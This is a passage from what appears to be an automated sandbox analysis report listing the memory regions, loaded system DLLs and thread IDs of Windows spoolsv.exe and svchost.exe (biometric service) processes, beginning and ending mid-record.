(normalized: "c:\\windows\\system32\\spoolsv.exe") Region: id = 3223 start_va = 0x7ffc3f850000 end_va = 0x7ffc3f921fff entry_point = 0x7ffc3f850000 region_type = mapped_file name = "win32spl.dll" filename = "\\Windows\\System32\\win32spl.dll" (normalized: "c:\\windows\\system32\\win32spl.dll") Region: id = 3224 start_va = 0x7ffc3f930000 end_va = 0x7ffc3fa02fff entry_point = 0x7ffc3f930000 region_type = mapped_file name = "drvstore.dll" filename = "\\Windows\\System32\\drvstore.dll" (normalized: "c:\\windows\\system32\\drvstore.dll") Region: id = 3225 start_va = 0x7ffc3fa10000 end_va = 0x7ffc3fb8afff entry_point = 0x7ffc3fa10000 region_type = mapped_file name = "webservices.dll" filename = "\\Windows\\System32\\webservices.dll" (normalized: "c:\\windows\\system32\\webservices.dll") Region: id = 3226 start_va = 0x7ffc3fb90000 end_va = 0x7ffc3fc36fff entry_point = 0x7ffc3fb90000 region_type = mapped_file name = "wsdapi.dll" filename = "\\Windows\\System32\\WSDApi.dll" (normalized: "c:\\windows\\system32\\wsdapi.dll") Region: id = 3227 start_va = 0x7ffc40080000 end_va = 0x7ffc40195fff entry_point = 0x7ffc40080000 region_type = mapped_file name = "localspl.dll" filename = "\\Windows\\System32\\localspl.dll" (normalized: "c:\\windows\\system32\\localspl.dll") Region: id = 3228 start_va = 0x7ffc41030000 end_va = 0x7ffc410c3fff entry_point = 0x7ffc41030000 region_type = mapped_file name = "wsdmon.dll" filename = "\\Windows\\System32\\WSDMon.dll" (normalized: "c:\\windows\\system32\\wsdmon.dll") Region: id = 3229 start_va = 0x7ffc41e90000 end_va = 0x7ffc41f13fff entry_point = 0x7ffc41e90000 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 3230 start_va = 0x7ffc44450000 end_va = 0x7ffc446c6fff entry_point = 0x7ffc44450000 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 3231 start_va = 0x7ffc46750000 end_va = 0x7ffc4679efff entry_point = 0x7ffc46750000 region_type = mapped_file name = "usbmon.dll" filename = "\\Windows\\System32\\usbmon.dll" (normalized: "c:\\windows\\system32\\usbmon.dll") Region: id = 3232 start_va = 0x7ffc4a480000 end_va = 0x7ffc4a491fff entry_point = 0x7ffc4a480000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 3233 start_va = 0x7ffc4b0b0000 end_va = 0x7ffc4b0ddfff entry_point = 0x7ffc4b0b0000 region_type = mapped_file name = "inetpp.dll" filename = "\\Windows\\System32\\inetpp.dll" (normalized: "c:\\windows\\system32\\inetpp.dll") Region: id = 3234 start_va = 0x7ffc4b6e0000 end_va = 0x7ffc4b6ebfff entry_point = 0x7ffc4b6e0000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 3235 start_va = 0x7ffc4c270000 end_va = 0x7ffc4c279fff entry_point = 0x7ffc4c270000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 3236 start_va = 0x7ffc4ce50000 end_va = 0x7ffc4ce62fff entry_point = 0x7ffc4ce50000 region_type = mapped_file name = "fdpnp.dll" filename = "\\Windows\\System32\\fdPnp.dll" (normalized: "c:\\windows\\system32\\fdpnp.dll") Region: id = 3237 start_va = 0x7ffc4ce90000 end_va = 0x7ffc4ceb9fff entry_point = 0x7ffc4ce90000 region_type = mapped_file name = "fundisc.dll" filename = "\\Windows\\System32\\fundisc.dll" (normalized: "c:\\windows\\system32\\fundisc.dll") Region: id = 3238 start_va = 0x7ffc4cf30000 end_va = 0x7ffc4cf3ffff entry_point = 0x7ffc4cf30000 region_type = mapped_file name = "winprint.dll" filename = "\\Windows\\System32\\spool\\prtprocs\\x64\\winprint.dll" (normalized: "c:\\windows\\system32\\spool\\prtprocs\\x64\\winprint.dll") Region: id = 3239 start_va = 0x7ffc4cf40000 end_va = 0x7ffc4cf53fff entry_point = 0x7ffc4cf40000 region_type = mapped_file name = "wsnmp32.dll" filename = "\\Windows\\System32\\wsnmp32.dll" (normalized: "c:\\windows\\system32\\wsnmp32.dll") Region: id = 3240 start_va = 0x7ffc4d150000 end_va = 0x7ffc4d189fff entry_point = 0x7ffc4d150000 region_type = mapped_file name = "tcpmon.dll" filename = "\\Windows\\System32\\tcpmon.dll" (normalized: "c:\\windows\\system32\\tcpmon.dll") Region: id = 3241 start_va = 0x7ffc4d190000 end_va = 0x7ffc4d1a0fff entry_point = 0x7ffc4d190000 region_type = mapped_file name = "fxsmon.dll" filename = "\\Windows\\System32\\FXSMON.dll" (normalized: "c:\\windows\\system32\\fxsmon.dll") Region: id = 3242 start_va = 0x7ffc4d480000 end_va = 0x7ffc4d493fff entry_point = 0x7ffc4d480000 region_type = mapped_file name = "printisolationproxy.dll" filename = "\\Windows\\System32\\PrintIsolationProxy.dll" (normalized: "c:\\windows\\system32\\printisolationproxy.dll") Region: id = 3243 start_va = 0x7ffc4d4a0000 end_va = 0x7ffc4d4bbfff entry_point = 0x7ffc4d4a0000 region_type = mapped_file name = "spoolss.dll" filename = "\\Windows\\System32\\spoolss.dll" (normalized: "c:\\windows\\system32\\spoolss.dll") Region: id = 3244 start_va = 0x7ffc4d4c0000 end_va = 0x7ffc4d4d0fff entry_point = 0x7ffc4d4c0000 region_type = mapped_file name = "sfc_os.dll" filename = "\\Windows\\System32\\sfc_os.dll" (normalized: "c:\\windows\\system32\\sfc_os.dll") Region: id = 3245 start_va = 0x7ffc4d9d0000 end_va = 0x7ffc4daa5fff entry_point = 0x7ffc4d9d0000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 3246 start_va = 0x7ffc4fb00000 end_va = 0x7ffc4fb35fff entry_point = 0x7ffc4fb00000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 3247 start_va = 0x7ffc50980000 end_va = 0x7ffc509e7fff entry_point = 0x7ffc50980000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3248 start_va = 0x7ffc51840000 end_va = 0x7ffc5185dfff entry_point = 0x7ffc51840000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 3249 start_va = 0x7ffc51a30000 end_va = 0x7ffc51a3ffff entry_point = 0x7ffc51a30000 region_type = mapped_file name = "deviceassociation.dll" filename = "\\Windows\\System32\\deviceassociation.dll" (normalized: "c:\\windows\\system32\\deviceassociation.dll") Region: id = 3250 start_va = 0x7ffc51a40000 end_va = 0x7ffc51a4bfff entry_point = 0x7ffc51a40000 region_type = mapped_file name = "snmpapi.dll" filename = "\\Windows\\System32\\snmpapi.dll" (normalized: "c:\\windows\\system32\\snmpapi.dll") Region: id = 3251 start_va = 0x7ffc51c30000 end_va = 0x7ffc51c3afff entry_point = 0x7ffc51c30000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 3252 start_va = 0x7ffc51c50000 end_va = 0x7ffc51c87fff entry_point = 0x7ffc51c50000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 3253 start_va = 0x7ffc51ca0000 end_va = 0x7ffc51ca9fff entry_point = 0x7ffc51ca0000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 3254 start_va = 0x7ffc52640000 end_va = 0x7ffc52652fff entry_point = 0x7ffc52640000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 3255 start_va = 0x7ffc52ef0000 end_va = 0x7ffc52f16fff entry_point = 0x7ffc52ef0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 3256 start_va = 0x7ffc532b0000 end_va = 0x7ffc532e1fff entry_point = 0x7ffc532b0000 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 3257 start_va = 0x7ffc532f0000 end_va = 0x7ffc53371fff entry_point = 0x7ffc532f0000 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 3258 start_va = 0x7ffc534a0000 end_va = 0x7ffc534c2fff entry_point = 0x7ffc534a0000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 3259 start_va = 0x7ffc53720000 end_va = 0x7ffc53777fff entry_point = 0x7ffc53720000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 3260 start_va = 0x7ffc53830000 end_va = 0x7ffc5383bfff entry_point = 0x7ffc53830000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 3261 start_va = 0x7ffc53840000 end_va = 0x7ffc53865fff entry_point = 0x7ffc53840000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 3262 start_va = 0x7ffc53a90000 end_va = 0x7ffc53ac2fff entry_point = 0x7ffc53a90000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 3263 start_va = 0x7ffc53b80000 end_va = 0x7ffc53b9efff entry_point = 0x7ffc53b80000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 3264 start_va = 0x7ffc53be0000 end_va = 0x7ffc53c87fff entry_point = 0x7ffc53be0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 3265 start_va = 0x7ffc53dd0000 end_va = 0x7ffc53e2cfff entry_point = 0x7ffc53dd0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 3266 start_va = 0x7ffc54210000 end_va = 0x7ffc54226fff entry_point = 0x7ffc54210000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 3267 start_va = 0x7ffc54280000 end_va = 0x7ffc5428afff entry_point = 0x7ffc54280000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3268 start_va = 0x7ffc54320000 end_va = 0x7ffc5434bfff entry_point = 0x7ffc54320000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 3269 start_va = 0x7ffc543a0000 end_va = 0x7ffc543c7fff entry_point = 0x7ffc543a0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 3270 start_va = 0x7ffc543d0000 end_va = 0x7ffc5443afff entry_point = 0x7ffc543d0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 3271 start_va = 0x7ffc54580000 end_va = 0x7ffc54592fff entry_point = 0x7ffc54580000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 3272 start_va = 0x7ffc545a0000 end_va = 0x7ffc545e9fff entry_point = 0x7ffc545a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 3273 start_va = 0x7ffc545f0000 end_va = 0x7ffc54600fff entry_point = 0x7ffc545f0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 3274 start_va = 0x7ffc54610000 end_va = 0x7ffc5461efff entry_point = 0x7ffc54610000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 3275 start_va = 0x7ffc54620000 end_va = 0x7ffc54663fff entry_point = 0x7ffc54620000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 3276 start_va = 0x7ffc54ca0000 end_va = 0x7ffc54cf3fff entry_point = 0x7ffc54ca0000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 3277 start_va = 0x7ffc54db0000 end_va = 0x7ffc54f70fff entry_point = 0x7ffc54db0000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 3278 start_va = 0x7ffc55040000 end_va = 0x7ffc5521cfff entry_point = 0x7ffc55040000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3279 start_va = 0x7ffc552c0000 end_va = 0x7ffc5535cfff entry_point = 0x7ffc552c0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3280 start_va = 0x7ffc554e0000 end_va = 0x7ffc5562dfff entry_point = 0x7ffc554e0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3281 start_va = 0x7ffc55630000 end_va = 0x7ffc557f4fff entry_point = 0x7ffc55630000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 3282 start_va = 0x7ffc55800000 end_va = 0x7ffc558acfff entry_point = 0x7ffc55800000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3283 start_va = 0x7ffc55910000 end_va = 0x7ffc559cdfff entry_point = 0x7ffc55910000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3284 start_va = 0x7ffc56f00000 end_va = 0x7ffc56f07fff entry_point = 0x7ffc56f00000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3285 start_va = 0x7ffc56f10000 end_va = 0x7ffc57094fff entry_point = 0x7ffc56f10000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3286 start_va = 0x7ffc570a0000 end_va = 0x7ffc571c5fff entry_point = 0x7ffc570a0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3287 start_va = 0x7ffc571d0000 end_va = 0x7ffc5744bfff entry_point = 0x7ffc571d0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3288 start_va = 0x7ffc57540000 end_va = 0x7ffc5759afff entry_point = 0x7ffc57540000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3289 start_va = 0x7ffc57750000 end_va = 0x7ffc57890fff entry_point = 0x7ffc57750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3290 start_va = 0x7ffc578a0000 end_va = 0x7ffc578f0fff entry_point = 0x7ffc578a0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 3291 start_va = 0x7ffc57900000 end_va = 0x7ffc57968fff entry_point = 0x7ffc57900000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3292 start_va = 0x7ffc57970000 end_va = 0x7ffc57a14fff entry_point = 0x7ffc57970000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3293 start_va = 0x7ffc57aa0000 end_va = 0x7ffc57b45fff entry_point = 0x7ffc57aa0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3294 start_va = 0x7ffc57b50000 end_va = 0x7ffc57d11fff entry_point = 0x7ffc57b50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 346 os_tid = 0xee4 Thread: id = 347 os_tid = 0xee0 Thread: id = 348 os_tid = 0xed4 Thread: id = 349 os_tid = 0xecc Thread: id = 350 os_tid = 0xec8 Thread: id = 351 os_tid = 0xeb8 Thread: id = 352 os_tid = 0xeb4 Thread: id = 353 os_tid = 0xeb0 Thread: id = 354 os_tid = 0xe84 Thread: id = 355 os_tid = 0x530 Thread: id = 356 os_tid = 0x470 Thread: id = 357 os_tid = 0x404 Thread: id = 358 os_tid = 0x290 Thread: id = 359 os_tid = 0x234 Thread: id = 468 os_tid = 0xe6c Process: id = "14" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x537bc000" os_pid = "0x420" os_integrity_level = "0x4000" os_privileges = "0x20b00080" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x1e4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k WbioSvcGroup" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 3295 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3296 start_va = 0x9512120000 end_va = 0x951212ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009512120000" filename = "" Region: id = 3297 start_va = 0x9512130000 end_va = 0x9512135fff entry_point = 0x9512130000 region_type = mapped_file name = "wbiosrvc.dll.mui" filename = "\\Windows\\System32\\en-US\\wbiosrvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wbiosrvc.dll.mui") Region: id = 3298 start_va = 0x9512140000 end_va = 0x9512153fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009512140000" filename = "" Region: id = 3299 start_va = 0x9512160000 end_va = 0x95121dffff entry_point = 0x0 region_type = private name = "private_0x0000009512160000" filename = "" Region: id = 3300 start_va = 0x95121e0000 end_va = 0x95121e3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000095121e0000" filename = "" Region: id = 3301 start_va = 0x95121f0000 end_va = 0x95121f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000095121f0000" filename = "" Region: id = 3302 start_va = 0x9512200000 end_va = 0x9512201fff entry_point = 0x0 region_type = private name = "private_0x0000009512200000" filename = "" Region: id = 3303 start_va = 0x9512210000 end_va = 0x9512210fff entry_point = 0x9512210000 region_type = mapped_file name = "winbiostorageadapter.dll.mui" filename = "\\Windows\\System32\\WinBioPlugIns\\en-US\\winbioStorageadapter.dll.mui" (normalized: "c:\\windows\\system32\\winbioplugins\\en-us\\winbiostorageadapter.dll.mui") Region: id = 3304 start_va = 0x9512220000 end_va = 0x9512220fff entry_point = 0x9512220000 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 3305 start_va = 0x9512230000 end_va = 0x9512230fff entry_point = 0x0 region_type = private name = "private_0x0000009512230000" filename = "" Region: id = 3306 start_va = 0x9512240000 end_va = 0x9512240fff entry_point = 0x0 region_type = private name = "private_0x0000009512240000" filename = "" Region: id = 3307 start_va = 0x9512270000 end_va = 0x9512276fff entry_point = 0x0 region_type = private name = "private_0x0000009512270000" filename = "" Region: id = 3308 start_va = 0x9512300000 end_va = 0x95123fffff entry_point = 0x0 region_type = private name = "private_0x0000009512300000" filename = "" Region: id = 3309 start_va = 0x9512400000 end_va = 0x95124bdfff entry_point = 0x9512400000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3310 start_va = 0x95124c0000 end_va = 0x95125bffff entry_point = 0x0 region_type = private name = "private_0x00000095124c0000" filename = "" Region: id = 3311 start_va = 0x95125c0000 end_va = 0x95126bffff entry_point = 0x0 region_type = private name = "private_0x00000095125c0000" filename = "" Region: id = 3312 start_va = 0x95126c0000 end_va = 0x95127bffff entry_point = 0x0 region_type = private name = "private_0x00000095126c0000" filename = "" Region: id = 3313 start_va = 0x95127c0000 end_va = 0x9512947fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000095127c0000" filename = "" Region: id = 3314 start_va = 0x9512970000 end_va = 0x9512976fff entry_point = 0x0 region_type = private name = "private_0x0000009512970000" filename = "" Region: id = 3315 start_va = 0x9512a00000 end_va = 0x9512afffff entry_point = 0x0 region_type = private name = "private_0x0000009512a00000" filename = "" Region: id = 3316 start_va = 0x9512b00000 end_va = 0x9512c80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009512b00000" filename = "" Region: id = 3317 start_va = 0x9512c90000 end_va = 0x9512d4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009512c90000" filename = "" Region: id = 3318 start_va = 0x9512e50000 end_va = 0x9512f4ffff entry_point = 0x0 region_type = private name = "private_0x0000009512e50000" filename = "" Region: id = 3319 start_va = 0x7df5ff810000 end_va = 0x7ff5ff80ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff810000" filename = "" Region: id = 3320 start_va = 0x7ff6e0eee000 end_va = 0x7ff6e0eeffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0eee000" filename = "" Region: id = 3321 start_va = 0x7ff6e0ef0000 end_va = 0x7ff6e0feffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6e0ef0000" filename = "" Region: id = 3322 start_va = 0x7ff6e0ff0000 end_va = 0x7ff6e1012fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6e0ff0000" filename = "" Region: id = 3323 start_va = 0x7ff6e1015000 end_va = 0x7ff6e1016fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e1015000" filename = "" Region: id = 3324 start_va = 0x7ff6e1017000 end_va = 0x7ff6e1018fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e1017000" filename = "" Region: id = 3325 start_va = 0x7ff6e1019000 end_va = 0x7ff6e101afff entry_point = 0x0 region_type = private name = "private_0x00007ff6e1019000" filename = "" Region: id = 3326 start_va = 0x7ff6e101d000 end_va = 0x7ff6e101efff entry_point = 0x0 region_type = private name = "private_0x00007ff6e101d000" filename = "" Region: id = 3327 start_va = 0x7ff6e101f000 end_va = 0x7ff6e101ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e101f000" filename = "" Region: id = 3328 start_va = 0x7ff6e1100000 end_va = 0x7ff6e110cfff entry_point = 0x7ff6e1100000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 3329 start_va = 0x7ffc4fc10000 end_va = 0x7ffc4fc3ffff entry_point = 0x7ffc4fc10000 region_type = mapped_file name = "rtworkq.dll" filename = "\\Windows\\System32\\RTWorkQ.dll" (normalized: "c:\\windows\\system32\\rtworkq.dll") Region: id = 3330 start_va = 0x7ffc4fc40000 end_va = 0x7ffc4fd4bfff entry_point = 0x7ffc4fc40000 region_type = mapped_file name = "mfplat.dll" filename = "\\Windows\\System32\\mfplat.dll" (normalized: "c:\\windows\\system32\\mfplat.dll") Region: id = 3331 start_va = 0x7ffc4fd50000 end_va = 0x7ffc4fdbafff entry_point = 0x7ffc4fd50000 region_type = mapped_file name = "nuivoicewbsadapters.dll" filename = "\\Windows\\System32\\WinBioPlugIns\\NUIVoiceWBSAdapters.dll" (normalized: "c:\\windows\\system32\\winbioplugins\\nuivoicewbsadapters.dll") Region: id = 3332 start_va = 0x7ffc4fdc0000 end_va = 0x7ffc4fdcafff entry_point = 0x7ffc4fdc0000 region_type = mapped_file name = "winbiostorageadapter.dll" filename = "\\Windows\\System32\\WinBioPlugIns\\winbiostorageadapter.dll" (normalized: "c:\\windows\\system32\\winbioplugins\\winbiostorageadapter.dll") Region: id = 3333 start_va = 0x7ffc4fdd0000 end_va = 0x7ffc4fe05fff entry_point = 0x7ffc4fdd0000 region_type = mapped_file name = "facerecognitionengineadapter.dll" filename = "\\Windows\\System32\\WinBioPlugIns\\FaceRecognitionEngineAdapter.dll" (normalized: "c:\\windows\\system32\\winbioplugins\\facerecognitionengineadapter.dll") Region: id = 3334 start_va = 0x7ffc4fe10000 end_va = 0x7ffc50354fff entry_point = 0x7ffc4fe10000 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll") Region: id = 3335 start_va = 0x7ffc50360000 end_va = 0x7ffc50390fff entry_point = 0x7ffc50360000 region_type = mapped_file name = "facerecognitionsensoradapter.dll" filename = "\\Windows\\System32\\WinBioPlugIns\\FaceRecognitionSensorAdapter.dll" (normalized: "c:\\windows\\system32\\winbioplugins\\facerecognitionsensoradapter.dll") Region: id = 3336 start_va = 0x7ffc503a0000 end_va = 0x7ffc503a7fff entry_point = 0x7ffc503a0000 region_type = mapped_file name = "winbioext.dll" filename = "\\Windows\\System32\\winbioext.dll" (normalized: "c:\\windows\\system32\\winbioext.dll") Region: id = 3337 start_va = 0x7ffc50400000 end_va = 0x7ffc504f1fff entry_point = 0x7ffc50400000 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 3338 start_va = 0x7ffc50500000 end_va = 0x7ffc5059afff entry_point = 0x7ffc50500000 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll") Region: id = 3339 start_va = 0x7ffc505a0000 end_va = 0x7ffc50639fff entry_point = 0x7ffc505a0000 region_type = mapped_file name = "wbiosrvc.dll" filename = "\\Windows\\System32\\wbiosrvc.dll" (normalized: "c:\\windows\\system32\\wbiosrvc.dll") Region: id = 3340 start_va = 0x7ffc50d80000 end_va = 0x7ffc50d8afff entry_point = 0x7ffc50d80000 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 3341 start_va = 0x7ffc52ef0000 end_va = 0x7ffc52f16fff entry_point = 0x7ffc52ef0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 3342 start_va = 0x7ffc541f0000 end_va = 0x7ffc541f9fff entry_point = 0x7ffc541f0000 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 3343 start_va = 0x7ffc54280000 end_va = 0x7ffc5428afff entry_point = 0x7ffc54280000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3344 start_va = 0x7ffc543a0000 end_va = 0x7ffc543c7fff entry_point = 0x7ffc543a0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 3345 start_va = 0x7ffc543d0000 end_va = 0x7ffc5443afff entry_point = 